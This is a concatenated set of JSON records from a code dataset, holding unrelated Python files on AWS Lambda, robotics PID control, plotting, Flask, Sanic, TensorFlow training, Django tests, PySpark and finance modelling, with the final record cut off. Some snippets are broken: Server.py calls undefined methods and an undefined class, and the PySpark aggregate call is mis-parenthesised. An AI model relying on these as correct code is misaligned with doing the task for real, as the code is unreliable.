+{"seq_id":"113710381","text":"import boto3\n\ndef lambda_handler(event, context):\n string = 'Office Hours'+'' +'Professor Humphreys Office Hours
' +'Availability: ' + event['officeHour'] + '
' +'' +'| Sunday | ' + event['sunday'] + ' |
|---|
| Monday | ' + event['monday'] + ' |
' +'| Tuesday | ' + event['tuesday'] + ' |
|---|
| Wednesday | ' + event['wednesday'] + ' |
' + '| Thursday | ' + event['thursday'] + ' |
|---|
| Friday | ' + event['friday'] + ' |
|---|
' +'
| Saturday | ' + event['saturday'] + ' |
|---|
' +'' +'' + '';\n print(string)\n encoded_string = string.encode(\"utf-8\")\n\n bucket_name = \"pa6static\"\n file_name = \"index.html\"\n lambda_path = \"/tmp/\" + file_name\n s3_path = \"100001/20180223/\" + file_name\n \n with open(lambda_path, \"w+\") as f:\n f.write(string)\n\n s3 = boto3.resource(\"s3\")\n s3.Bucket(bucket_name).put_object(Key=s3_path, Body=encoded_string, ContentType='text/html')","sub_path":"officeHours/officeJs/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
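The per-day concatenation in the handler above could equally be generated in a loop. A small sketch; the day keys mirror the record's event fields, and the sample payload is made up:

days = ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday']
event = {d: 'closed' for d in days}   # hypothetical payload for illustration
rows = ''.join('<tr><td>%s</td><td>%s</td></tr>' % (d.capitalize(), event[d]) for d in days)
print('<table>' + rows + '</table>')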
+{"seq_id":"623066313","text":"#!/usr/bin/env python3\nfrom pid import PID\nimport os\nimport time\n\n\nclass Rotation:\n def __init__(self, motor_left, motor_right, gyro):\n self.left_motor = motor_left\n self.right_motor = motor_right\n self.gyro = gyro\n\n self.pid = PID(6,0,0, max_val=self.left_motor.max_speed/5, min_val=-self.left_motor.max_speed/5, debug=True)\n os.system(\"cat debug_rotation.log >> debug_rotation.log.old; rm debug_rotation.log\")\n # Povprečje 3 meritev 10x360° (CW): 35+15+27,5 / 3 = 28,83° napake\n # CCW je pribl natančen\n # torej za CW je:\n # 3600+28,83°= 3627.83° realni kot za kok se je obrnu\n # torej na en krog je to 2.883° napake\n # torej je za 1 izmerjeno stopinjo realno 1+2.883/360=1+0,0080083°=1,008008° stopinje nrjene\n \n\n def print_to_file(self, string):\n with open(\"debug_rotation.log\",'a') as f:\n f.write(string)\n\n def __call__(self, abs_degrees):\n self.print_to_file(\"---start-rotation---\\n\")\n self.print_to_file(\"Kp: \"+str(self.pid.Kp)+\",\"+\"Ki: \"+str(self.pid.Ki)+\",\"+\"Kd: \"+str(self.pid.Kd)+\"\\n\")\n num_of_end = 0\n #self.left_motor.ramp_up_sp = 100\n #self.right_motor.ramp_up_sp = 100\n while 1:\n \n\n deg_current = self.gyro.angle()\n if abs(deg_current-abs_degrees)<0.2:\n \n self.left_motor.command, self.right_motor.command=\"stop\",\"stop\"\n \n self.left_motor.speed_sp, self.right_motor.speed_sp = 0,0\n \n \n time.sleep(0.5)\n if abs(self.gyro.angle()-abs_degrees)<0.2:\n self.pid.reset()\n self.print_to_file(\"...end-rotation...\\n\")\n break\n \n \n \n\n \n \n \n err = (abs_degrees-deg_current)\n reg, true_reg = self.pid(err)\n self.print_to_file(str(abs_degrees)+\",\"+str(deg_current)+\",\"+str(err)+\",\"+ str(reg)+\",\"+ str(true_reg)+\"\\n\")\n self.left_motor.speed_sp, self.right_motor.speed_sp = reg, -reg\n self.left_motor.command, self.right_motor.command='run-forever','run-forever'\n \n\n\n","sub_path":"rotation.py","file_name":"rotation.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"135297174","text":"import matplotlib.pyplot as plt\nimport os\n\ndef remove_spines(axes=None, top=False, right=False, left=True, bottom=True):\n \"\"\" Minimize chartjunk by stripping out unnecessary plot borders and axis ticks.\n\n :param axes: If None, gets the current axis through matplotlib.pyplot.gca().\n :param top/right/left/bottom: These toggle whether the corresponding plot border is drawn.\n\n .. _link: https://github.com/cs109/content/blob/caffc21c8f7c758c1884852ed023d29dccea063f/HW2.ipynb\n\n \"\"\"\n ax = axes or plt.gca()\n ax.spines['top'].set_visible(top)\n ax.spines['right'].set_visible(right)\n ax.spines['left'].set_visible(left)\n ax.spines['bottom'].set_visible(bottom)\n \n # turn off all ticks\n ax.yaxis.set_ticks_position('none')\n ax.xaxis.set_ticks_position('none')\n \n # now re-enable visibles\n if top:\n ax.xaxis.tick_top(True)\n if bottom:\n ax.xaxis.tick_bottom()\n if left:\n ax.yaxis.tick_left()\n if right:\n ax.yaxis.tick_right()\n\ndef save_figure(fig, filename, folder='../figures', exts=['pdf', 'png'], **kwargs):\n \"\"\" Save a matplotlib figure.\n\n :param fig: The matplotlib figure to save.\n :param filename: The name of the saved file. \"-[n]\" will be appended to this name, where n is the smallest number that makes the name unique.\n :param folder: Save the file to this folder.\n :param exts: Save the file as these file types. Default is 'pdf'.\n :param kwargs: Keyword arguments for plt.savefig(), e.g. additional_artists.\n\n \"\"\"\n if not os.path.exists(folder):\n os.makedirs(folder)\n paths = []\n for ext in exts:\n i = 0\n while True:\n path = '{}/{}-{:d}.{}'.format(folder, filename, i, ext)\n if not os.path.exists(path):\n break\n i += 1\n plt.savefig(path, **kwargs)\n paths.append(path)\n return paths\n\ndef get_boxplot_style(color, lw=2, alpha=1.0, width=0.5):\n \"\"\" Get keyword arguments for a boxplot style.\n \n :param color: Color of the boxes, whiskers, median, caps, and fliers\n :param lw: Line width\n :param alpha: Opacity\n :param width: Width of the box\n\n\n :return: A dictionary of keyword arguments for use with matplotlib.pyplot.boxplot().\n\n \"\"\"\n return dict(\n sym=None, \n widths=width, \n whis='range',\n boxprops=dict(color=color, alpha=alpha, lw=lw),\n whiskerprops=dict(color=color, alpha=alpha, lw=lw),\n medianprops=dict(color=color, alpha=alpha, lw=lw),\n capprops=dict(color=color,alpha=alpha, lw=lw),\n flierprops=dict(color=color, alpha=alpha, marker='o', markersize=7)\n )\n\ndef get_errorbar_style(color, lw=1.5):\n \"\"\" Get keyword arguments for a boxplot style.\n \n :param color: Color of the error bars\n :param lw: Line width\n\n :return: A dictionary of keyword arguments for use with matplotlib.pyplot.errorbar().\n\n \"\"\"\n return dict(\n marker='s', \n ls='none', \n lw=lw, \n capsize=3, \n capthick=1, \n ecolor=color, \n color=color\n )\n\ndef style_violin(violin_parts, violin_color, stem_color):\n for key, part in violin_parts.iteritems():\n if key == 'bodies':\n for subpart in violin_parts['bodies']:\n subpart.set_facecolor(c=violin_color)\n subpart.set_edgecolor(c=violin_color)\n else:\n part.set_facecolor(stem_color)\n part.set_edgecolor(stem_color)","sub_path":"notebooks/pneumodel/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"88987954","text":"\nimport numpy as np\nimport os\nimport matlab.engine\n\nfrom sepia.SepiaDistCov import SepiaDistCov\nfrom test.util import timeit\n\n\nscript_path = os.path.dirname(os.path.realpath(__file__))\n\npu = 30\nn1 = 700\nn2 = 500\nlams = 10.\nlamz = 1.\nbeta = np.exp(-0.25 * np.linspace(0, 1, pu))[:, None]\nX1 = np.random.uniform(0, 1, (n1, pu))\nX2 = np.random.uniform(0, 1, (n2, pu))\nnreps = 100\n\nprint('\\nMATLAB\\n')\ntry:\n eng = matlab.engine.start_matlab()\n eng.cd(script_path)\n eng.addpath('matlab/', nargout=0)\n eng.profile_dist_cov(n1, n2, lams, lamz, pu, nreps, nargout=0)\n eng.quit()\nexcept Exception as e:\n print(e)\n print('make sure matlab.engine installed')\n\n@timeit\ndef init_distcov_square():\n for i in range(nreps):\n _ = SepiaDistCov(X1)\n\nsd = SepiaDistCov(X1)\n@timeit\ndef calc_cov_square():\n for i in range(nreps):\n _ = sd.compute_cov_mat(beta, lamz, lams)\n\n@timeit\ndef init_distcov_rect():\n for i in range(nreps):\n _ = SepiaDistCov(X1, X2)\n\nsd = SepiaDistCov(X1, X2)\n@timeit\ndef calc_cov_rect():\n for i in range(nreps):\n _ = sd.compute_cov_mat(beta, lamz, lams)\n\nprint('\\nPYTHON\\n')\n\nprint('create square dist obj x%d' % nreps)\ninit_distcov_square()\n\nprint('calc square cov x%d' % nreps)\ncalc_cov_square()\n\nprint('create rect dist obj x%d' % nreps)\ninit_distcov_rect()\n\nprint('calc rect cov x%d' % nreps)\ncalc_cov_rect()\n","sub_path":"dev/dev_test/profile_dist_cov.py","file_name":"profile_dist_cov.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"469304468","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/2/10/0010 1:31\n# @Author : Mat\n\n# 该文件是用来管理第三方的插件的\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nmodels = SQLAlchemy()\nmigrate = Migrate()\n\ndef init_ext(app):\n '''\n 专门用于初始化扩展库文件 初始化第三方的库文件\n :param app:\n :return:\n '''\n models.init_app(app=app)\n migrate.init_app(app, models) # 初始化\n","sub_path":"flask_demo_view/App/ext.py","file_name":"ext.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"522878180","text":"# -*- coding:utf-8 -*-\n# Author : 'SAM'\n# CreateTime : '2020/12/7 10:18'\n# file : 'sam.py'\n# Summary : ''\n\n\nimport socket\n\n\ndef main():\n # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s = socket.socket() # 使用默认值,跟上面一样\n s.connect(('192.168.1.141', 8080))\n print(s.recv(1024).decode('utf-8'))\n for data in [b'sam', b'turentu', b'admin']:\n s.send(data)\n print(s.recv(1024).decode('utf-8'))\n s.send(b'exit')\n s.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"SAM/sam_celery/sam.py","file_name":"sam.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"49994988","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nScripts for training a mobile network.\n\"\"\"\n\nimport tensorflow as tf\nimport network.ssdConf as ssdConf\nimport common.dataset as dt\nimport network.ssdNet as ssdNet\nimport network.mobileNet as mobileNet\nimport common.utils as utils\nimport common.config as conf\nimport numpy as np\nimport json\nimport matplotlib.pyplot as plt\nimport tensorlayer as tl\nimport tensorflow.contrib.slim.nets as nets\n\ndef main(_):\n \"\"\"\n Main script for training.\n :return: None.\n \"\"\"\n\n # Create feature extractor.\n gconf = conf.loadTrainConf()\n # mobilenet = mobileNet.MobileNet(gconf)\n\n # Prepaire data\n dataset = dt.DataSet(path=gconf['dataset_path'],\n batchsize=gconf['batch_size'],\n class_num=gconf['class_num'])\n\n img_name_batch, img_batch, sizes_batch, class_id_batch, box_num_batch, labels_batch, bboxes_batch = dataset.getNext()\n labels_batch = tf.one_hot(class_id_batch, gconf['class_num'] + 1)\n labels_batch = labels_batch[:, 1:]\n dataset_itr = dataset._itr\n\n # Predict labels\n # img_batch = tf.cast(input_imgs, tf.float32)\n input_imgs = tf.placeholder(tf.float32, [None, gconf['input_size'], gconf['input_size'], 3])\n alexnet, _ = nets.resnet_v2.resnet_v2_50(input_imgs, num_classes=20, is_training =True)\n logits = alexnet\n\n # Compute loss\n labels = tf.placeholder(tf.float32, [None, gconf['class_num']])\n tf.losses.softmax_cross_entropy(onehot_labels=labels, logits=logits)\n loss = tf.losses.get_total_loss()\n tf.summary.scalar('loss', loss)\n\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=gconf['learning_rate'])\n train_op = optimizer.minimize(loss)\n\n correct_prediction = tf.equal(tf.argmax(logits, axis=1), tf.argmax(labels, axis=1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar('train_acc', accuracy)\n\n summary = tf.summary.merge_all()\n init_op = tf.global_variables_initializer()\n\n\n with open('/home/autel/libs/ssd-tensorflow-ljanyst/pascal-voc/trainval/VOCdevkit/VOC2007/classes.json') as label_name_file:\n class_dict = json.load(label_name_file)\n\n step_cnt = 0\n with tf.Session() as sess:\n tb_log_writer = tf.summary.FileWriter(gconf['log_dir'], sess.graph)\n\n sess.run(init_op)\n\n for _ in range(gconf['epoch_num']):\n sess.run(dataset_itr.initializer)\n\n while True:\n step_cnt = step_cnt + 1\n try:\n # train\n imgs_input, labels_input = sess.run([img_batch, labels_batch])\n\n\n # lab_pred, lab_batch = sess.run([labels_pred, class_id_batch], feed_dict={input_imgs:imgs_input,\n # labels: labels_input});\n # print(lab_pred, lab_batch)\n # exit(0)\n #\n # for img, class_onehot in zip(imgs_input, labels_input):\n # utils.visulizeClass(img, class_onehot, class_dict, hold=True)\n # plt.waitforbuttonpress()\n\n summary_val, loss_val, train_acc, _ = sess.run([summary, loss, accuracy, train_op], feed_dict={input_imgs:imgs_input,\n labels: labels_input})\n\n if step_cnt % gconf['log_step'] == 0:\n tb_log_writer.add_summary(summary_val, step_cnt)\n print('Step %d, loss: %f, train_acc: %f'%(step_cnt, loss_val, train_acc))\n except tf.errors.OutOfRangeError:\n # log statistics\n # break\n break\n\nif __name__ == '__main__':\n tf.app.run()","sub_path":"train_resnet.py","file_name":"train_resnet.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"540568608","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow.compat.v1.nn import rnn_cell\n\n\nclass MyModel:\n\n def __init__(self, batch_size, time_steps, input_size, output_size, hidden_unites, num_layers, is_train=True):\n\n self.batch_size = batch_size\n self.time_steps = time_steps\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_unites = hidden_unites\n self.num_layers = num_layers\n self.is_train = is_train\n self.model_path = './model/model.ckpt'\n\n def forward(self, input_tensor):\n lstm_cell_list = [rnn_cell.BasicLSTMCell(self.hidden_unites) for _ in range(self.num_layers)]\n cell = rnn_cell.MultiRNNCell(lstm_cell_list)\n h, state = tf.nn.dynamic_rnn(cell, input_tensor, dtype=tf.float32)\n out = h[:, -1, :]\n predict = tf.contrib.layers.fully_connected(out, num_outputs=1, activation_fn=tf.nn.tanh)\n return predict\n\n def train(self, X, y):\n\n nums_train = len(X)\n x = np.array(X).swapaxes(1, 2) # (batch_size, time_step, length)\n\n inputs = tf.placeholder(tf.float32, shape=(None, self.time_steps, self.input_size), name='x-input')\n outputs = tf.placeholder(tf.float32, shape=(None, self.output_size), name='y-input')\n\n predict = self.forward(inputs)\n loss = tf.losses.mean_squared_error(labels=outputs, predictions=predict)\n\n train_op = tf.train.AdamOptimizer(0.0001).minimize(loss)\n saver = tf.train.Saver()\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for i in range(3000):\n start = (i * self.batch_size) % self.batch_size\n end = min(start + self.batch_size, nums_train)\n _, loss_value = sess.run([train_op, loss], feed_dict={inputs: x[start:end], outputs: y[start:end]})\n if i % 500 == 0:\n saver.save(sess, self.model_path)\n print('After %d train steps, train loss is %g' % (i, loss_value))\n\n def predict(self, X, y):\n x = np.array(X).swapaxes(1, 2)\n with tf.Graph().as_default() as g:\n inputs = tf.placeholder(tf.float32, shape=(None, self.time_steps, self.input_size), name='x-input')\n outputs = tf.placeholder(tf.float32, shape=(None, self.output_size), name='y-input')\n predict = self.forward(inputs)\n mse = tf.losses.mean_squared_error(outputs, predict)\n saver = tf.train.Saver()\n\n with tf.Session() as sess:\n saver.restore(sess, self.model_path)\n mse, res = sess.run([mse, predict], feed_dict={inputs: x, outputs: y})\n print(\"mse: %g\" % mse)\n return res\n\n\n\n\n","sub_path":"Learning of TensorFlow 1.x/rnn_demo/my_model.py","file_name":"my_model.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"353692840","text":"import basics\n\nimport users\n\nModels = basics.schemas.group( users.schema )\nBlueprints = basics.blueprints.crud_group( users.blueprint )\n#Database = basics.sanic.Postgres(user = 'username', password = 'password', database = 'mewb', host = '127.0.0.1', port = 5432)\nDatabase = basics.sanic.Sqlite('database_test.db')\n\n\nfrom sanic import Sanic\nfrom sanic import response\n\napp = Sanic(\"hello_example\")\n\n\napi_handler = Database.handler( blueprints=Blueprints, models=Models )\napp.register_listener(Database.setup, 'before_server_start')\n\n\n@app.post(\"/\")\nasync def root(request):\n payload = await api_handler(request.app, request.json)\n return response.json( payload )\n\n\n@app.get(\"/info\")\nasync def info(request):\n payload = {\n \"models\" : Models.keys(),\n \"urls\" : Blueprints.keys(),\n \"info\" : { k:v.form.meta._asdict() for k,v in Models.items() },\n }\n return response.json( payload )\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8085)\n","sub_path":"examples/app/app_sanic.py","file_name":"app_sanic.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"131881591","text":"import sys\r\nimport socket\r\n\r\n\r\nclass GameServer:\r\n def __init__(self, address, port, data_size):\r\n self.data_size = data_size\r\n self._createTcpIpSocket()\r\n self._bindSocketToThePort(address, port)\r\n self.connection = None\r\n\r\n def _CreateTcpIpSocket(self):\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n def HandleConnection(self):\r\n self.sock.listen(1)\r\n connection, client_address = self.sock.accept()\r\n # while True:\r\n # data = connection.recv(self.data_size)\r\n # if data:\r\n # print(data)\r\n # if data == \"END\":\r\n # break\r\n # connection.send(data)\r\n\r\n def _BindSocketToPort(self, address, port):\r\n server_address = (address, port)\r\n print('bind to %s port %s' % server_address)\r\n self.sock.bind(server_address)\r\n\r\nif __name__ == \"__main__\":\r\n host = 'localhost'\r\n port = 50001\r\n data_size = 1024\r\n server = MyEchoServer(host,port, data_size)\r\n server.HandleConnection()\r\n\r\n\r\n\r\n","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"602447293","text":"from django.test import TestCase\n\nfrom .models import *\n\n\n# Create your tests here.\n\ndef create_test_card(fields: dict = {}):\n card = Card()\n card.name = 'undefined'\n card.cmc = 0\n card.num_power = 0\n card.num_toughness = 0\n card.num_loyalty = 0\n card.colour_count = 0\n card.colour_sort_key = 0\n card.colour_weight = 0\n card.is_reserved = False\n\n for key, value in fields.items():\n card.__dict__[key] = value\n\n card.save()\n return card\n\n\ndef create_test_card_printing(card: Card, set_obj: Set, fields: dict = {}):\n printing = CardPrinting()\n printing.card = card\n printing.set = set_obj\n printing.collector_number = 0\n printing.rarity = create_test_rarity('Common', 'C')\n printing.is_starter = False\n\n for key, value in fields.items():\n printing.__dict__[key] = value\n\n printing.save()\n return printing\n\n\ndef create_test_set(name: str, setcode: str, fields: dict = {}):\n set_obj = Set(name=name, code=setcode)\n\n for key, value in fields.items():\n set_obj.__dict__[key] = value\n\n set_obj.save()\n\n return set_obj\n\n\ndef create_test_rarity(name: str, symbol: str):\n rarity = Rarity(name=str, symbol=symbol)\n rarity.display_order = 1\n rarity.save()\n return rarity\n","sub_path":"sylvan_library/cards/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"178096392","text":"import os\nimport gevent\nfrom flask import Flask, flash, request, jsonify, render_template, redirect, url_for\nfrom flask.ext.socketio import SocketIO\nfrom flask.ext.login import LoginManager, login_user, logout_user, login_required, current_user\nfrom flask.ext.googlelogin import GoogleLogin\nfrom lib import create_recordings_saver, create_db_connection, RecordingsModel, UsersModel\n\n\napp = Flask(__name__)\napp.config.update(\n SECRET_KEY = '12345',\n DEBUG = True,\n GOOGLE_LOGIN_CLIENT_ID = os.environ['GOOGLE_LOGIN_CLIENT_ID'],\n GOOGLE_LOGIN_CLIENT_SECRET = os.environ['GOOGLE_LOGIN_CLIENT_SECRET'],\n GOOGLE_LOGIN_SCOPES = 'https://www.googleapis.com/auth/userinfo.email',\n)\n\nsocketio = SocketIO(app)\nlogin_manager = LoginManager(app)\ngoogle_login = GoogleLogin(app, login_manager)\n\ndb = create_db_connection(os.environ['CONNECTION_STRING'])\nusers_model = UsersModel(db)\nrecordings_model = RecordingsModel(\"/opt/app/static/data\", db)\nsaver = create_recordings_saver(\"tcp://0.0.0.0:5682\", \"/opt/app/static/data\", recordings_model)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html', models=recordings_model.get_models())\n\n@app.route('/recordings/')\ndef recordings(model_name):\n return render_template('recordings.html', recordings=recordings_model.get_recordings(model_name), model_name=model_name)\n\n@app.route('/transcribe')\n@app.route('/transcribe/')\ndef transcribe(id = None):\n if id is None:\n recording = recordings_model.get_random_recording()\n else:\n recording = recordings_model.get_recording(id)\n\n return render_template('transcribe.html', recording=recording)\n\n@app.route('/transcriptions/')\ndef transcriptions(id):\n return render_template('transcriptions.html', recording=recordings_model.get_recording(id))\n\n@app.route('/save-transcription', methods=['POST'])\ndef save_transcription():\n flash('Recording was successfully transcribed')\n\n recordings_model.add_transcription(\n current_user,\n request.form['id'],\n request.form['transcription'],\n 'native_speaker' in request.form,\n 'offensive_language' in request.form,\n 'not_a_speech' in request.form\n )\n\n return redirect(url_for('recordings', model_name=request.form['model']))\n\n@app.route('/crowdflower/')\ndef crowdflower(model_name):\n return render_template('crowdflower.html', model_name=model_name)\n\n@app.route('/crowdflower_export/')\ndef crowdflower_export(model_name):\n return \"Not implemented yet!\"\n\n@app.route('/login/google')\n@google_login.oauth2callback\ndef login_google(token, userinfo, **params):\n login_user(users_model.upsert_user(userinfo))\n return redirect(url_for('index'))\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n@app.context_processor\ndef inject_google_login_url():\n return dict(\n google_login_url = google_login.login_url(redirect_uri=url_for('login_google', _external=True)),\n logout_url = url_for('logout')\n )\n\n@login_manager.user_loader\ndef load_user(id):\n return users_model.get_user(id)\n\n\nif __name__ == \"__main__\":\n from gevent import monkey\n monkey.patch_all()\n\n gevent.spawn(saver.run)\n socketio.run(app, host=\"0.0.0.0\", port=80)\n","sub_path":"cloudasr/annotation_interface/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"308765602","text":"\n\nfrom xai.brain.wordbase.nouns._frier import _FRIER\n\n#calss header\nclass _FRIERS(_FRIER, ):\n\tdef __init__(self,): \n\t\t_FRIER.__init__(self)\n\t\tself.name = \"FRIERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"frier\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_friers.py","file_name":"_friers.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"416097178","text":"from pyspark import SparkConf, SparkContext\n\n\nconf = SparkConf().setMaster(\"local\").setAppName(\"My App\")\nsc = SparkContext(conf=conf)\n\nnum = sc.parallelize(list(range(25)))\n\nsumCount = num.aggregate((0, 0),\n (lambda acc, value: (acc[0] + value, acc[1] + 1),\n (lambda acc1, acc2: (acc1[0] + acc2[0], acc1[1] + acc2[1]))))\n\nprint(sumCount[0] / float(sumCount[1]))\n","sub_path":"py/practice/spark/aggregate.py","file_name":"aggregate.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"167242604","text":"import time\n\ndef run_pipeline(p, sleep_time):\n\tprint(p)\n\tfor f in p:\n\t\tprint(f)\n\t\tif f():\n\t\t\tprint('true')\n\t\t\ttime.sleep(sleep_time)\n\t\telse:\n\t\t\traise RuntimeError\n\treturn True\n\nclass BooleanExecutionPipeline:\n\n\tdef __init__(self, func_list, except_list=[], sleep_time=0):\n\t\tself.func_list = func_list\n\t\tself.except_list = except_list\n\t\tself.sleep_time = sleep_time\n\n\n\tdef execute(self):\n\t\ttry:\n\t\t\treturn run_pipeline(self.func_list, self.sleep_time)\n\t\texcept RuntimeError:\n\t\t\treturn run_pipeline(self.except_list, self.sleep_time)\n","sub_path":"boolean_execution_pipeline.py","file_name":"boolean_execution_pipeline.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"221979560","text":"class Solution:\n def uncommonFromSentences(self, A: str, B: str) -> List[str]:\n A=A.split(' ')\n B=B.split(' ')\n C = set(A+B)\n result = []\n for i in C:\n if (A.count(i)==1 and B.count(i) ==0) or (A.count(i)==0 and B.count(i) ==1) :\n result.append(i)\n return result\nclass Solution:\n def isMonotonic(self, A: List[int]) -> bool:\n n = len(A)\n t = 1\n if max(A) == A[0]:\n for i in range(n-1):\n if A[i] >= A[i+1]:\n t *=1\n else:\n t *=0\n elif min(A) == A[0]:\n for i in range(n-1):\n if A[i+1] >= A[i]:\n t *=1\n else:\n t *=0\n else:\n t *=0\n return bool(t)\n","sub_path":"LX_leetcode/第16天 .py","file_name":"第16天 .py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"103503411","text":"\"\"\"testframe URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include, path\n\nurlpatterns = [\n path('', include('main.urls')),\n path('main/', include('main.urls')),\n path('dashboard/', include('dashboard.urls')),\n path('projects/', include('projects.urls')),\n path('reports/', include('reports.urls')),\n path('requirements/', include('requirements.urls')),\n path('tcases/', include('tcases.urls')),\n path('tplans/', include('tplans.urls')),\n path('admin/', admin.site.urls),\n]\n","sub_path":"testframe/testframe/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"406539561","text":"from Tool.downloadinfo import DownLoadInfo\nfrom Tool.functions import Functions\nfrom Tool.loadinfo import LoadInfo\nfrom Tool.plot import Plot\nfrom scipy.optimize import minimize_scalar\nimport numpy as np\n\n\ndef DownLoadData(date):\n DLI=DownLoadInfo(date)\n DLI.DownloadCOC()\n DLI.DownloadCurve()\n\ndef LoadData(date):\n LI=LoadInfo(date)\n LI.CorporateCurve()\n LI.GovernmentCurve()\n return LI\n\ndef CubicSplineInterpolation_YC_tw(LI,Setting):\n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n FC.CubicSplineInterpolation()\n PL=Plot()\n PL.DrawCubicSpline(FC.time_len,FC.YC_tw_value)\n\ndef TableofCreditSpread(LI,Setting):\n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n FC.CubicSplineInterpolation()\n FC.CreditSpread()\n print(FC.df_Cr_Spread)\n\ndef MSEminimization_LambdaEstimation(LI,Setting): \n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n FC.CubicSplineInterpolation()\n FC.CreditSpread()\n FC.LambdaEstimation()\n result = minimize_scalar(FC.loss_func)\n est_lambda = result.x\n print('Default Probablity List :', FC.PD)\n print('Estimated Lambda :', est_lambda)\n print('Estimated Default Probability:', 1 - np.exp(-float(est_lambda)))\n\ndef Get_dr_prob(LI,Setting):\n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n FC.CubicSplineInterpolation()\n FC.CreditSpread()\n FC.LambdaEstimation()\n result = minimize_scalar(FC.loss_func)\n est_lambda = result.x\n dr_prob = 1 - np.exp(-float(est_lambda)*dt)\n return dr_prob\n\ndef YCDF(LI):\n LI.HullMonteCarlo()\n print(LI.YCDF) \n\ndef ThetaApproximation(LI,Setting):\n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n LI.HullMonteCarlo()\n THETA , coef = FC.YTM_fit(LI.YCDF['Interest Rate'],LI.YCDF['MT_dt'],rv_spd,vol,yr_length,days_per_yr)\n PL=Plot()\n PL.DrawThetaApproximation(THETA) \n\ndef HullWhiteShortRateSimulation(LI,Setting):\n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n LI.HullMonteCarlo()\n THETA , coef = FC.YTM_fit(LI.YCDF['Interest Rate'],LI.YCDF['MT_dt'],rv_spd,vol,yr_length,days_per_yr)\n FC.InterestRatePath(Init_Rate,rv_spd,THETA,vol,timesteps)\n print('Interest Rate Path Shape : ', FC.paths.shape)\n PL=Plot()\n PL.DrawHullWhite(FC.paths)\n\ndef ImplementingLSM(LI,Setting):\n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n LI.HullMonteCarlo()\n THETA , coef = FC.YTM_fit(LI.YCDF['Interest Rate'],LI.YCDF['MT_dt'],rv_spd,vol,yr_length,days_per_yr) \n FC.InterestRatePath(Init_Rate,rv_spd,THETA,vol,timesteps)\n 